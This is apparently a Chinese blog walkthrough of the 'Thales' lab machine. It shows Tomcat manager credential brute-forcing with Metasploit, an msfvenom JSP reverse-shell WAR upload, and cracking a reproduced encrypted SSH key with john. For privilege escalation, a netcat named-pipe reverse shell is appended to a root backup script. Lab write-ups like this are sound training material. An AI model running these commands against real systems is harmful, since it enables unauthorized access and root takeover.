Thales.md

知识点:

  1. 爆破tomcat密码
  2. msf工具的使用
  3. ssh私钥爆破
  4. 反弹shell

靶场环境

靶场下载地址:
kali IP:192.168.2.23
靶机地址:192.168.2.12

信息收集

使用arp-scan进行主机存活扫描:
image.png
扫描到存活主机192.168.2.12

使用nmap进行更详细的端口和服务扫描:

nmap -sV -p- 192.168.2.12 -O -v

image.png

  • 开放22端口,开启ssh服务,版本是OpenSSH 7.6p1 Ubuntu 4ubuntu0.5。
  • 开放8080端口,开启http服务,具体是Apache Tomcat 9.0.52
  • 操作系统版本为Linux,内核版本可能在4.X到5.X之间

nmap扫一下系统有没有漏洞:
image.png
发现存在一个Slowloris DOS攻击漏洞,CVE-2007-6750
目标服务器上可能存在一些文件夹和路径:

| http-enum:   
|   /examples/: Sample scripts  
|   /manager/html/upload: Apache Tomcat (401 )  
|   /manager/html: Apache Tomcat (401 )  
|_  /docs/: Potentially interesting folder

访问http://192.168.2.12:8080,可以看到该主机开放了一个Tomcat,版本为9.0.52:
image.png

direarch扫描目录信息:
image.png

访问http://192.168.2.12可以看到一个登录页面:
image.png

访问http://192.168.2.12:8080/examples/是一些目录
image.png

漏洞利用

爆破tomcat用户和密码

打开msf:

┌──(root㉿kali)-[~]
└─# msfconsole 

msf6 > search login tomcat 
Matching Modules
================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/tomcat_mgr_login                   normal  No     Tomcat Application Manager Login Utility

msf6 > use 0
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.2.12
RHOSTS => 192.168.2.12
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

稍等片刻,得到用户名和密码:tomcat:role1
image.png

登录:
image.png
image.png

发现一个可以上传文件的地方,上传的格式是war格式,可以判断出这是一个java的后端,可以在这边上传一个shell:
image.png

使用msfvenom创建一个反弹shell的木马:

┌──(root㉿kali)-[~]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.23 LPORT=4501 -f war -o revshell.war

Payload size: 1106 bytes
Final size of war file: 1106 bytes
Saved as: revshell.war

image.png

选择刚刚创建好的木马进行上传:
image.png

在kali上开启监听:

nc -lvvp 4501

然后点/reshell,运行一下文件
image.png

就监听成功了:
image.png

用python做一个交互式的shell:

python3 -c "import pty;pty.spawn('/bin/bash')"
tomcat@miletus:/$

简单看一下有没有什么flag:
image.png

在/home/thales目录下有两个txt文件和一个ssh文件:
image.png
访问user.txt权限不够

tomcat@miletus:/home/thales$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.

 翻译:
 我为你准备了备份剧本。该脚本位于“/usr/local/bin/backup.sh”目录中。祝好运。

看下.ssh/id_rsa,是一个rsa私钥,先存下来,一会拿去john爆破:
image.png

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6103FE9ABCD5EF41F96C07F531922AAF

ZMlKhm2S2Cqbj+k3h8MgQFr6oG4CBKqF1NfT04fJPs1xbXe00aSdS+QgIbSaKWMh
+/ILeS/r8rFUt9isW2QAH7JYEWBgR4Z/9KSMSUd1aEyjxz7FpZj2cL1Erj9wK9ZA
InMmkm7xAKOWKwLTJeMS3GB4X9AX9ef/Ijmxx/cvvIauK5G2jPRyGSazMjK0QcwX
pkwnm4EwXPDiktkwzg15RwIhJdZBbrMj7WW9kt0CF9P754mChdIWzHrxYhCUIfWd
rHbDYTKmfL18LYhHaj9ZklkZjb8li8JIPvnJDcnLsCY+6X1xB9dqbUGGtSHNnHiL
rmrOSfI7RYt9gCgMtFimYRaS7gFuvZE/NmmIUJkH3Ccv1mIj3wT1TCtvREv+eKgf
/nj+3A6ZSQKFdlm22YZBilE4npxGOC03s81Rbvg90cxOhxYGTZMu/jU9ebUT2HAh
o1B972ZAWj3m5sDZRiQ+wTGqwFBFxF9EPia6sRM/tBKaigIElDSyvz1C46mLTmBS
f8KNwx5rNXkNM7dYX1Sykg0RreKO1weYAA0yQSHCY+iJTIf81CuDcgOIYRywHIPU
9rI20K910cLLo+ySa7O4KDcmIL1WCnGbrD4PwupQ68G2YG0ZOOIrwE9efkpwXPCR
Vi2TO2Zut8x6ZEFjz4d3aWIzWtf1IugQrsmBK+akRLBPjQVy/LyApqvV+tYfQelV
v9pEKMxR5f1gFmZpTbZ6HDHmEO4Y7gXvUXphjW5uijYemcyGx0HSqCSER7y7+phA
h0NEJHSBSdMpvoS7oSIxC0qe4QsSwITYtJs5fKuvJejRGpoh1O2HE+etITXlFffm
2J1fdQgPo+qbOVSMGmkITfTBDh1ODG7TZYAq8OLyEh/yiALoZ8T1AEeAJev5hON5
PUUP8cxX4SH43lnsmIDjn8M+nEsMEWVZzvaqo6a2Sfa/SEdxq8ZIM1Nm8fLuS8N2
GCrvRmCd7H+KrMIY2Y4QuTFR1etulbBPbmcCmpsXlj496bE7n5WwILLw3Oe4IbZm
ztB5WYAww6yyheLmgU4WkKMx2sOWDWZ/TSEP0j9esOeh2mOt/7Grrhn3xr8zqnCY
i4utbnsjL4U7QVaa+zWz6PNiShH/LEpuRu2lJWZU8mZ7OyUyx9zoPRWEmz/mhOAb
jRMSyfLNFggfzjswgcbwubUrpX2Gn6XMb+MbTY3CRXYqLaGStxUtcpMdpj4QrFLP
eP/3PGXugeJi8anYMxIMc3cJR03EktX5Cj1TQRCjPWGoatOMh02akMHvVrRKGG1d
/sMTTIDrlYlrEAfQXacjQF0gzqxy7jQaUc0k4Vq5iWggjXNV2zbR/YYFwUzgSjSe
SNZzz4AMwRtlCWxrdoD/exvCeKWuObPlajTI3MaUoxPjOvhQK55XWIcg+ogo9X5x
B8XDQ3qW6QJLFELXpAnl5zW5cAHXAVzCp+VtgQyrPU04gkoOrlrj5u22UU8giTdq
nLypW+J5rGepKGrklOP7dxEBbQiy5XDm/K/22r9y+Lwyl38LDF2va22szGoW/oT+
8eZHEOYASwoSKng9UEhNvX/JpsGig5sAamBgG1sV9phyR2Y9MNb/698hHyULD78C
-----END RSA PRIVATE KEY-----

image.png

ssh私钥爆破

使用john进行爆破:

将SSH私钥文件中的密钥转换成了 John the Ripper 可以理解的格式,然后用john对密码进行爆破,使用的是/usr/share/wordlists/rockyou.txt字典

解压/usr/share/wordlists下的ockyou.txt.gz:

┌──(root㉿kali)-[/usr/share/wordlists]
└─# gunzip /usr/share/wordlists/rockyou.txt.gz

image.png
image.png

┌──(root㉿kali)-[~/Desktop]
└─# ssh2john '/root/Desktop/ssh.txt' > key.txt
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt '/root/Desktop/key.txt' 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
vodka06          (/root/Desktop/ssh.txt)     
1g 0:00:00:01 DONE (2024-03-08 02:04) 0.7874g/s 2251Kp/s 2251Kc/s 2251KC/s vodka1420..vodka0260
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

image.png

密码:vodka06

切换到thales用户,输入密码vodka06,查看user.txt,就可以获得flag:

tomcat@miletus:~$ su thales
su thales
Password: vodka06

thales@miletus:/opt/tomcat$ cd /home
cd /home
thales@miletus:/home$ ls -la 
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Aug 15  2021 .
drwxr-xr-x 24 root   root   4096 Oct 14  2021 ..
drwxr-xr-x  6 thales thales 4096 Oct 14  2021 thales
thales@miletus:/home$ cd thales
cd thales
thales@miletus:~$ ls
ls
notes.txt  user.txt
thales@miletus:~$ cat user.txt
cat user.txt
a837c0b5d2a8a07225fd9905f5a0e9c4

image.png

提权

看一下之前作者留下的线索,/usr/local/bin/backup.sh藏了什么好东西,瞅一眼权限,可以编辑:
image.png

看一眼内容,这个脚本会将 /opt/tomcat/ 目录备份到 /var/backups 目录下,并生成一个以当前星期几和主机名命名的 .tgz 归档
image.png

可以在里面插入一行反弹shell的命令:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh

等一会之后就可以反弹成功了,查看flag:

posted @ 2024-03-08 16:44  imawuya  阅读(90)  评论(0)    收藏  举报
@keyframes spin3D{from{transform:rotate3d(0.5,0.5,0.5,360deg)}to{transform:rotate3d(0deg)}}#loading{height:100%;background-color:#1d2630;display:flex;justify-content:center;align-items:center;position:fixed;top:0;left:0;right:0;overflow:hidden;z-index:99999999}.spinner-box{width:300px;height:300px;display:flex;justify-content:center;align-items:center;background-color:transparent}.leo{position:absolute;display:flex;justify-content:center;align-items:center;border-radius:50%}.blue-orbit{width:165px;height:165px;border:1px solid #91daffa5;animation:spin3D 3s linear .2s infinite}.green-orbit{width:120px;height:120px;border:1px solid #91ffbfa5;animation:spin3D 2s linear 0s infinite}.red-orbit{width:90px;height:90px;border:1px solid #ffca91a5;animation:spin3D 1s linear 0s infinite}.white-orbit{width:60px;height:60px;border:2px solid #fff;animation:spin3D 10s linear 0s infinite}.w1{transform:rotate3D(1,1,1,90deg)}.w2{transform:rotate3D(1,2,0.5,90deg)}.w3{transform:rotate3D(0.5,1,2,90deg)}